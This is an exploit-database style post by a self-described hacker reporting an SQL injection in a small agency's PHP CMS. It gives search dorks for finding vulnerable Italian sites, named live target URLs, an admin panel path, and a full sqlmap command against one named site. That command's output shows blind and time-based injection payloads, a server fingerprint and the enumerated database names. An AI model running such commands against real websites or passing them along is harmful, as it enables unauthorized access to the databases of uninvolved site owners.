# Exploit Title: alfacommunication.it SQL Injection vulnerability
# Date: 29/11/2019
# Dork:
inurl:detail.php?id= site:.it
inurl:5ad.php?id= site:.it
inurl:single-news.php?id= site:.it
inurl:caseinterno.php?id= site.it
# Exploit Author: H9xHacker
# Tested on: Linux

Reverse check
bing.com ip:54.76.134.14 .php?id=
(There are 55 domains hosted on this server.)

# Demo
ediliziafiorentina.it/detail.php?id=19
old.faraone.it/5ad.php?id=319
intesagdi.it/0a-newsdetail.php?id=405

# Admin control panel path
site.it/cms/

# PoC:
sqlmap --level=5 --risk=3 --timeout=10 --threads=10 --random-agent -u 'http://old.faraone.it/5ad.php?id=319' --no-cast --batch --dbs

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=319 AND 7712=7712

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=319 AND (SELECT 9560 FROM (SELECT(SLEEP(5)))ORoc)
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP
back-end DBMS: MySQL >= 5.0.12
available databases [2]:
[*] `cms-faraone`
[*] information_schema
------------------------

video: https://www.youtube.com/watch?v=EEvMO-jyDPE

Greets: To All My Friends